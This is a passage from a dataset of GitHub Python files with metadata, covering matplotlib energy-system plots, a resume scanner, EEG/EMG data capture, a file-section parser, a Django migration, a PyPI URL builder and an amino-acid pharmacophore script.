ax.plot([nodes[n][\"x\"]+0.2*width[n], nodes[n][\"x\"]+8], [nodes[n][\"y\"]+0.3*width[n],nodes[n][\"y\"]+15], \"black\")\n \n \n ax.set_axisbelow(True)\n plt.grid(color = \"grey\")\n \n# plt.axis('equal')\n ax.set_xlim(0,500)\n ax.set_ylim(0,400)\n xticks =np.arange(0,600,100)\n yticks =np.arange(0,500,100)\n plt.xticks(xticks)\n plt.yticks(yticks)\n xlabels = [\"{:2d}\".format(x) for x in xticks]\n ylabels = [\"{:2d}\".format(x) for x in yticks]\n ax.set_xticklabels(xlabels, fontsize = 12)\n ax.set_yticklabels(ylabels, fontsize = 12)\n \n plt.show()\n \n \n \n # Create legend\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n for n in nodes:\n plt.scatter(nodes[n][\"x\"], nodes[n][\"y\"], color = \"white\")\n wedges_legend = [patches.Wedge((70,325), 7.68, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,325), 7.68, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,275), 9.65, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,275), 9.65, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,225), 11.48, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,225), 11.48, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,175), 13.65, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,175), 13.65, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,125), 17.17, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,125), 17.17, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n patches.Wedge((70,75), 20.4, 0, 180, fill = True, facecolor = \"red\", edgecolor = \"black\"),\n patches.Wedge((70,75), 20.4, 180, 360, fill = True, facecolor = \"blue\", edgecolor = \"black\"),\n ]\n for item in wedges_legend:\n ax.add_patch(item)\n \n ax.text(110, 325, \"100 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 275, \"250 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 225, \"500 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 175, \"1000 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 125, \"2500 MWh\", fontsize = 12, verticalalignment = \"center\")\n ax.text(110, 75, \"5000 MWh\", fontsize = 12, verticalalignment = \"center\")\n\n ax.set_xlim(0,500)\n ax.set_ylim(0,400)\n xticks =np.arange(0,600,100)\n yticks =np.arange(0,500,100)\n plt.xticks(xticks)\n plt.yticks(yticks)\n xlabels = [\"{:2d}\".format(x) for x in xticks]\n ylabels = [\"{:2d}\".format(x) for x in yticks]\n ax.set_xticklabels(xlabels, fontsize = 12)\n ax.set_yticklabels(ylabels, fontsize = 12)\n \n# ax.grid(False)\n# ax.set_xticks([])\n# ax.set_yticks([])\n\n plt.show() \n \n \n \n \n\n # # 15.1 (Labor)\n# ax.text(nodes[0][\"x\"]+8, nodes[0][\"y\"]+22, \"1\", fontsize = 12)\n# ax.plot([nodes[0][\"x\"]+3, nodes[0][\"x\"]+9], [nodes[0][\"y\"]+3,nodes[0][\"y\"]+19], \"black\")\n# # 04.01 (Restaurant)\n# ax.text(nodes[1][\"x\"]+8, nodes[1][\"y\"]+22, \"2\", fontsize = 12)\n# ax.plot([nodes[1][\"x\"]+3, nodes[1][\"x\"]+9], [nodes[1][\"y\"]+3,nodes[1][\"y\"]+19], \"black\")\n# # 16.4 (Rechenzentrum)\n# ax.text(nodes[2][\"x\"]+8, nodes[2][\"y\"]+22, \"3\", fontsize = 12)\n# ax.plot([nodes[2][\"x\"]+3, nodes[2][\"x\"]+9], [nodes[2][\"y\"]+3,nodes[2][\"y\"]+19], \"black\")\n# # 16.3 (Rechenzentrum)\n# ax.text(nodes[3][\"x\"]+8, nodes[3][\"y\"]+22, \"4\", fontsize = 12)\n# ax.plot([nodes[3][\"x\"]+3, nodes[3][\"x\"]+9], [nodes[3][\"y\"]+3,nodes[3][\"y\"]+19], \"black\")\n# # 15.13\n# ax.text(nodes[4][\"x\"]+8, nodes[4][\"y\"]+22, \"5\", fontsize = 12)\n# ax.plot([nodes[4][\"x\"]+3, nodes[4][\"x\"]+9], [nodes[4][\"y\"]+3,nodes[4][\"y\"]+19], \"black\") \n# # 15.8\n# ax.text(nodes[5][\"x\"]-18, nodes[5][\"y\"]-35, \"6\", fontsize = 12)\n# ax.plot([nodes[5][\"x\"]-4, nodes[5][\"x\"]-9], [nodes[5][\"y\"]-5,nodes[5][\"y\"]-19], \"black\") \n# # 15.7\n# ax.text(nodes[6][\"x\"]+8, nodes[6][\"y\"]+22, \"7\", fontsize = 12)\n# ax.plot([nodes[6][\"x\"]+3, nodes[6][\"x\"]+9], [nodes[6][\"y\"]+3,nodes[6][\"y\"]+19], \"black\") \n# # 15.14\n# ax.text(nodes[7][\"x\"]+8, nodes[7][\"y\"]+22, \"7\", fontsize = 12)\n# ax.plot([nodes[7][\"x\"]+3, nodes[7][\"x\"]+9], [nodes[7][\"y\"]+3,nodes[6][\"y\"]+19], \"black\") \n \n #ax.text(317705,5642825,\"04.01\", zorder = 1000, fontsize = size) \n", "repo_name": "LKivi/Energy_System_Optimization", "sub_path": "EctoPlanner/plot_buildings.py", "file_name": "plot_buildings.py", "file_ext": "py", "file_size_in_byte": 7738, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.patches.Wedge", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}]}
+{"seq_id": "8157355733", "text": "# Download required libraries\nimport docx2txt\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n# This function's argument is a .docx file type document path\ndef main(document):\n # Load data\n resume = docx2txt.process(document)\n\n # in this expression we use another .docx file type document against the one we want to score\n # this document has the required keywords\n job_description = docx2txt.process('job_description.docx')\n\n # creating a list of text\n texts_list = [resume, job_description]\n\n count_v = CountVectorizer()\n\n count_matrix = count_v.fit_transform(texts_list)\n\n # Print the similar scores\n print('Curriculum Vitae score:')\n matchPercentage = cosine_similarity(count_matrix)[0][1] * 100\n\n print(str(round(matchPercentage, 2)) + ' %')\n input()\n\n\nif __name__ == '__main__':\n main('myCV.docx')\n", "repo_name": "cathbert/ResumeScanner", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "docx2txt.process", "line_number": 10, "usage_type": "call"}, {"api_name": "docx2txt.process", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.cosine_similarity", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "36169732518", "text": "import numpy as np\nimport time\nimport scipy.io as sio\n\nfrom ismore import brainamp_channel_lists\nfrom riglib.brainamp.rda import *\n\n\n\nfs = 1000\nchannels = brainamp_channel_lists.emg_eog2_eeg\n\ntotal_time = 120 # how many secs of data to receive and save\n\nn_samples = 2 * fs * total_time # allocate twice as much space as expected\nn_chan = len(channels)\n\n\nDATA = np.zeros((n_chan, n_samples))\nidxs = np.zeros(n_chan, int)\n\nchan_to_row = dict()\nfor row, chan in enumerate(channels):\n chan_to_row[chan] = row\n\nemgdata_obj = EMGData()\nemgdata_obj.start()\n\nstart_time = time.time()\n\nwhile (time.time() - start_time) < total_time:\n chan, data = emgdata_obj.get()\n\n row = chan_to_row[chan]\n idx = idxs[row]\n\n DATA[row, idx] = data['data']\n idxs[row] += 1\n\n\nsave_dict = {'data': DATA}\nsio.matlab.savemat('brainamp_data.mat', save_dict)\n", "repo_name": "carmenalab/brain-python-interface", "sub_path": "tests/ibmi/brainamp/basic_brainamp_test.py", "file_name": "basic_brainamp_test.py", "file_ext": "py", "file_size_in_byte": 847, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "ismore.brainamp_channel_lists.emg_eog2_eeg", "line_number": 11, "usage_type": "attribute"}, {"api_name": "ismore.brainamp_channel_lists", "line_number": 11, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "time.time", "line_number": 31, "usage_type": "call"}, {"api_name": "scipy.io.matlab.savemat", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.io.matlab", "line_number": 42, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "34353116510", "text": "from __future__ import annotations\n\nimport pathlib\nimport os\n\nfrom header import SectionHeader\nfrom icecream import ic\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~+\n# section_number : 6\n# section_description: file_classes\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~-\n\nclass MonitoredFile:\n\n def __init__(self, path : pathlib.Path) -> None:\n self.path = path\n self.filename = self.path.name.split(\".\")[0]\n self.filetype = self.path.name.split(\".\")[-1]\n self.prev_mod_time = self.get_mod_time()\n self.pulse_file_changed : bool = False\n\n # Attempt to read all lines on init to validate this is possible for this file.\n try:\n with open(self.path, \"r\") as f:\n self.lines : list[str] = f.readlines()\n except:\n self.lines_readable = False\n else:\n self.lines_readable = True\n\n # Save the RAM, we don't need the lines right now.\n self.lines : list[str] = []\n\n def get_mod_time(self) -> float:\n try:\n return os.stat(self.path).st_mtime\n except:\n return None\n\n def detect_file_change(self) -> bool:\n new_mod_time = self.get_mod_time()\n if self.prev_mod_time != new_mod_time and new_mod_time is not None:\n self.pulse_file_changed = True\n self.prev_mod_time = new_mod_time\n else:\n self.pulse_file_changed = False\n\n return self.pulse_file_changed\n\n def __eq__(self, __value: object) -> bool:\n return self.path == __value.path\n\n def __hash__(self) -> int:\n return hash(tuple(self.path, self.filename, self.filetype))\n\nclass SectionFile(MonitoredFile):\n \"\"\"MonitoredFile that is one numbered and described part of a MasterFile\"\"\"\n\n def __init__(\n self,\n path : pathlib.Path,\n section_number: int,\n section_description: str,\n master_file : MasterFile\n ) -> None:\n\n super().__init__(path)\n self.section_number = section_number\n self.section_description = section_description\n self.lines : list[str] = []\n self.master_file = master_file\n\nclass MasterFile(MonitoredFile):\n \"\"\"MonitoredFile with sections delimited by headers\"\"\"\n def __init__(self, path : pathlib.Path) -> None:\n\n super().__init__(path)\n self.dir_master_sections = path.parent.resolve().joinpath(\"sections\").joinpath(self.filename)\n self.sections : list[SectionFile] = []\n self.section_header : SectionHeader = None\n\nclass HeaderSpecifier:\n\n def __init__(\n self,\n header_start_line,\n header_end_line,\n section_number,\n section_description\n ) -> None:\n\n self.header_start_line = header_start_line\n self.header_end_line = header_end_line\n self.code_start_line = None\n self.code_end_line = None\n self.section_number = section_number\n self.section_description = section_description\n\ndef parse_master_file_headers(master_file : MasterFile) -> list[HeaderSpecifier]:\n\n # The header sequence specifies the position\n # in standard_header_sequence that is being\n # parsed for\n\n last_head_sq_index = len(master_file.section_header.key_sequence) - 1\n\n head_sq_index = 0\n parsing_header = False\n header_lines : list[str] = []\n return_header_specifiers : list[HeaderSpecifier] = []\n new_header_specifier = None\n\n section_number = None\n section_description = None\n\n # ic(\"Parsing master file\", master_file.filename)\n\n try:\n with open(master_file.path, \"r\") as f:\n\n for line_num, line in enumerate(f):\n line : str\n\n # ic(\"evaluating line\\n\", line)\n\n index_char = 0\n\n # Parse the entire line, which could contain\n # several header sequence elements\n while index_char < len(line):\n # ic(head_sq_index)\n current_header_sequence_string = master_file.section_header.key_sequence[head_sq_index]\n test_string = line[index_char : index_char + len(current_header_sequence_string)]\n header_sequence_match = test_string == current_header_sequence_string\n pulse_last_head_sq_index = last_head_sq_index == head_sq_index\n header_parse_success = False\n\n # ic(current_header_sequence_string, test_string, header_sequence_match, pulse_last_head_sq_index)\n\n # Header text match\n if header_sequence_match:\n index_char += len(master_file.section_header.key_sequence[head_sq_index])\n header_parse_success = True\n\n # Header sequence number\n if current_header_sequence_string == master_file.section_header.key_number:\n\n parse_key = False\n\n # Get the section number as string\n if pulse_last_head_sq_index:\n section_number_str = line[index_char:].strip()\n parse_key = True\n\n else:\n next_test_string = master_file.section_header.key_sequence[head_sq_index + 1]\n try:\n next_test_string_index = line[index_char:].index(next_test_string)\n except:\n pass\n else:\n section_number_str = line[index_char:][:next_test_string_index].strip()\n parse_key = True\n\n if parse_key:\n try:\n section_number = int(section_number_str)\n except:\n pass\n else:\n header_parse_success = True\n index_char += len(section_number_str)\n\n # Header sequence description\n if current_header_sequence_string == master_file.section_header.key_description:\n\n # Get the section number as string\n if pulse_last_head_sq_index:\n section_description = line[index_char:].strip()\n header_parse_success = True\n\n else:\n next_test_string = master_file.section_header.key_sequence[head_sq_index + 1]\n try:\n next_test_string_index = line[index_char:].index(next_test_string)\n except:\n pass\n else:\n section_description = line[index_char:][:next_test_string_index].strip()\n header_parse_success = True\n index_char += len(section_description)\n\n # Increment header sequence index\n # or reset if header parsing failure\n if header_parse_success:\n head_sq_index += 1\n if pulse_last_head_sq_index:\n\n head_sq_index = 0\n index_char = len(line)\n\n header_lines.append(line)\n\n # ic(\"header complete\", line_num, header_lines)\n new_header_specifier = HeaderSpecifier(\n header_start_line= line_num - len(header_lines) + 1,\n header_end_line= line_num,\n section_description= section_description,\n section_number= section_number\n )\n\n else:\n # ic(\"just a regular line\", line)\n head_sq_index = 0\n index_char = len(line)\n\n if new_header_specifier is not None:\n # ic(\"parsing when code starts and ends...\")\n\n if line.strip() and new_header_specifier.code_start_line is None:\n new_header_specifier.code_start_line = line_num\n # ic(new_header_specifier.code_start_line)\n\n if line.strip():\n new_header_specifier.code_end_line = line_num\n # ic(new_header_specifier.code_end_line)\n\n if not parsing_header:\n header_lines = []\n\n if header_parse_success and not pulse_last_head_sq_index:\n parsing_header = True\n header_lines.append(line.strip())\n # ic(\"Header parse success\",header_lines)\n\n elif parsing_header:\n\n parsing_header = False\n header_lines = []\n\n if new_header_specifier is not None:\n return_header_specifiers.append(new_header_specifier)\n\n except PermissionError:\n pass\n\n return return_header_specifiers\n\nif __name__ == \"__main__\":\n\n section_header = SectionHeader(\n key_sequence= [\n \"numnumnum\",\n \" \",\n \"numnumnum\",\n \" \",\n \"numnumnum\",\n \" \",\n \"numnumnum\",\n \" \",\n \"spank \",\n \"numnumnum\",\n \"\\n\",\n \" dobonk: \",\n \"descdescdesc\",\n \"\\n\",\n \"] browntown\"\n ],\n key_number= \"numnumnum\",\n key_description= \"descdescdesc\"\n )\n\n temporary_file_path = pathlib.Path(\"test.txt\").resolve()\n\n with open(temporary_file_path, \"w\") as f:\n\n f.write(section_header.generate_header(number= 1, description= \"section one\"))\n\n f.write(\"\\n\")\n\n f.write(\"code code\\ncode section 1\\n\")\n\n f.write(section_header.generate_header(number= 2, description= \"section two\"))\n\n f.write(\"\\n\")\n\n f.write(\"code section 2\\n\\n\\n\\n\\nend of section2\")\n\n f.write(\"\\n\")\n f.write(\"spank \")\n\n mfile = MasterFile(\n path= temporary_file_path,\n dir_master_sections= pathlib.Path(\"temp_sections\").resolve()\n )\n mfile.section_header = section_header\n\n if not mfile.dir_master_sections.is_dir():\n os.mkdir(mfile.dir_master_sections)\n\n mfile.parse()\n\n for section in mfile.sections:\n print(f\"Section {section.section_number}, {section.section_description}\")\n for line in section.lines:\n print(f\"\\t{line}\")\n\n with open(section.path, \"w\") as f:\n for line_number, line in enumerate(section.lines):\n if line_number < len(section.lines) - 1:\n f.write(line + \"\\n\")\n else:\n f.write(line)", "repo_name": "UpAllNate/filesectioner", "sub_path": "project_repo/file_class.py", "file_name": "file_class.py", "file_ext": "py", "file_size_in_byte": 11134, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pathlib.Path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 37, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "header.SectionHeader", "line_number": 81, "usage_type": "name"}, {"api_name": "header.SectionHeader", "line_number": 252, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 274, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 295, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 300, "usage_type": "call"}]}
+{"seq_id": "8564140142", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('front', '0005_auto_20150602_2356'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='event',\n name='category',\n field=models.ForeignKey(blank=True, to='front.Category', null=True),\n ),\n ]\n", "repo_name": "bikeanjo/bikeanjo", "sub_path": "front/migrations/0006_event_category.py", "file_name": "0006_event_category.py", "file_ext": "py", "file_size_in_byte": 429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "34621511168", "text": "\"\"\"Where we build the urls that we'll search in scrapy.\"\"\"\nimport subprocess\n\nimport isort # noqa: F401\nimport snoop\nfrom loguru import logger\nfrom systemd import journal\n\nfmt = \"{time} - {name} - {level} - {message}\"\nlogger.add(\"../logs/info.log\", level=\"INFO\", format=fmt, backtrace=True, diagnose=True) # noqa: E501\nlogger.add(\"../logs/error.log\", level=\"ERROR\", format=fmt, backtrace=True, diagnose=True) # noqa: E501\n\nsubprocess.run([\"isort\", __file__])\n\n\ndef type_watch(source, value):\n return \"type({})\".format(source), type(value)\n\n\nsnoop.install(watch_extras=[type_watch])\n\n\n@logger.catch\n@snoop\ndef build_url_list():\n \"\"\"\n We get the usual structure of pypi site,\n and insert the names in the name list\n where the names usually go in the url.\n \"\"\"\n\n with open(\"/home/mic/python/cli_apps/cli_apps/lists/pypi/only_names.txt\", \"r\") as f:\n names = f.readlines()\n journal.sendv(\"MESSAGE=only_names_list\", \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\")\n for name in names:\n journal.sendv(\"MESSAGE=the name is {}\".format(name), \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\", \"CODE_LINE=34\")\n\n urls = []\n sname = [i for i in names if not (\".\") in i]\n journal.sendv(\"MESSAGE=List sname\", \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\", \"CODE_LINE=39\")\n for name in sname:\n lname = name.lower()\n gname = lname.replace(\"-\", \"_\")\n rname = gname.strip()\n journal.sendv(\"MESSAGE=rname is {}\".format(rname), \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\", \"CODE_LINE=43\")\n url = f\"https://pypi.org/project/{rname}\"\n urls.append(url)\n\n for url in urls:\n journal.sendv(\"MESSAGE=url is {}\".format(url), \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\", \"CODE_LINE=48\")\n with open(\"/home/mic/python/cli_apps/cli_apps/lists/pypi/urls.txt\", \"a\") as f:\n f.write(url)\n f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n build_url_list()\n", "repo_name": "miccaldas/old_alternative_projects", "sub_path": "old_cli_apps/build_url_list.py", "file_name": "build_url_list.py", "file_ext": "py", "file_size_in_byte": 2012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "loguru.logger.add", "line_number": 10, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 10, "usage_type": "name"}, {"api_name": "loguru.logger.add", "line_number": 11, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 11, "usage_type": "name"}, {"api_name": "subprocess.run", "line_number": 13, "usage_type": "call"}, {"api_name": "snoop.install", "line_number": 20, "usage_type": "call"}, {"api_name": "systemd.journal.sendv", "line_number": 34, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 34, "usage_type": "name"}, {"api_name": "systemd.journal.sendv", "line_number": 36, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 36, "usage_type": "name"}, {"api_name": "systemd.journal.sendv", "line_number": 40, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 40, "usage_type": "name"}, {"api_name": "systemd.journal.sendv", "line_number": 45, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 45, "usage_type": "name"}, {"api_name": "systemd.journal.sendv", "line_number": 50, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 50, "usage_type": "name"}, {"api_name": "loguru.logger.catch", "line_number": 23, "usage_type": "attribute"}, {"api_name": "loguru.logger", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "35586605251", "text": "from pmapper.pharmacophore import Pharmacophore as P\nfrom rdkit import Chem\nfrom rdkit import RDConfig\nimport os\nimport pandas as pd\nfrom Bio.SeqUtils import seq3\n\n# Иницилизируем фармакофоры, которые будут использоваться в RDkit, возможно файл BaseFeatures.fdef можно отредактировать, чтобы там были нужные нам фармакофоры, но у меня не получилось\n\nfdefName = os.path.join(RDConfig.RDDataDir,'BaseFeatures.fdef') \nfactory = Chem.ChemicalFeatures.BuildFeatureFactory(fdefName)\n\n# SMILES-представление для аминокислот\naa_smiles = {'ALA': 'O=C(O)[C@H](C)N',\n 'CYS': 'O=C(O)[C@H](CS)N', \n 'ASP': 'O=C(O)[C@H](CC(O)=O)N', \n 'GLU': 'O=C(O)[C@H](CCC(O)=O)N', \n 'PHE': 'O=C(O)[C@H](CC1=CC=CC=C1)N', \n 'GLY': 'O=C(O)CN', \n 'HIS': 'O=C(O)[C@H](CC1=CNC=N1)N', \n 'ILE': 'O=C(O)[C@H]([C@@H](C)CC)N', \n 'LYS': 'O=C(O)[C@H](CCCCN)N', \n 'LEU': 'O=C(O)[C@H](CC(C)C)N', \n 'MET': 'O=C(O)[C@H](CCSC)N', \n 'ASN': 'O=C(O)[C@H](CC(N)=O)N', \n 'PRO': 'O=C(O)[C@H]1NCCC1', \n 'GLN': 'O=C(O)[C@H](CCC(N)=O)N', \n 'ARG': 'O=C(O)[C@H](CCCNC(N)=N)N', \n 'SER': 'O=C(O)[C@H](CO)N', \n 'THR': 'O=C(O)[C@H]([C@H](O)C)N', \n 'VAL': 'O=C(O)[C@H](C(C)C)N', \n 'TRP': 'O=C(O)[C@H](CC1=CNC2=CC=CC=C12)N',\n 'TYR': 'O=C(O)[C@H](CC1=CC=C(C=C1)O)N'}\n\n# Сопоставление pmapper фармакофоров и rdkit фармакофоров\ncompare = {\"A\": \"Acceptor\",\n \"D\": \"Donor\",\n \"P\": \"PosIonizable\",\n \"N\": \"NegIonizable\",\n \"H\": \"Hydrophobe\",\n \"a\": \"Aromatic\"}\n\n# Считаем фармакофоры для всех аминокислот с помощью двух тулов. Сохраняем результаты в 2 датафрейма\n\npharmacophore_RDkit = pd.DataFrame(columns = [aa for aa in aa_smiles], index = [\"Hydrophobe\", \"PosIonizable\", \"NegIonizable\", \"Acceptor\", \"Donor\", \"Aromatic\", \"Sulphur\"])\npharmacophore_RDkit = pharmacophore_RDkit.fillna(0)\npharmacophore_Pmapper = pd.DataFrame(columns = [aa for aa in aa_smiles], index = [\"Hydrophobe\", \"PosIonizable\", \"NegIonizable\", \"Acceptor\", \"Donor\", \"Aromatic\", \"Sulphur\"])\npharmacophore_Pmapper = pharmacophore_Pmapper.fillna(0)\nfor aa in aa_smiles:\n #RDkit\n mol = Chem.MolFromSmiles(aa_smiles[aa])\n mol = Chem.AddHs(mol) \n Chem.AllChem.EmbedMolecule(mol, randomSeed=42)\n feats = factory.GetFeaturesForMol(mol)\n for i in range(len(feats)): \n ph = feats[i].GetFamily()\n if feats[i].GetFamily() == \"LumpedHydrophobe\":\n ph = \"Hydrophobe\"\n pharmacophore_RDkit[aa][ph] += 1\n #Pmapper\n p = P()\n p.load_from_mol(mol)\n pharmacophore_dict = p.get_features_count()\n for i in pharmacophore_dict:\n pharmacophore_Pmapper[aa][compare[i]] += pharmacophore_dict[i]\n if \"S\" in aa_smiles[aa]:\n pharmacophore_RDkit[aa][\"Sulphur\"] += 1\n pharmacophore_Pmapper[aa][\"Sulphur\"] += 1\n \n# Функции для подсчета разницы фармакофоров \ndef get_pharm_diff_RDkit(row):\n wild = seq3(row[\"WILD_TYPE\"]).upper()\n mutant = seq3(row[\"MUTANT\"]).upper()\n return list(pharmacophore_RDkit[mutant] - pharmacophore_RDkit[wild])\ndef 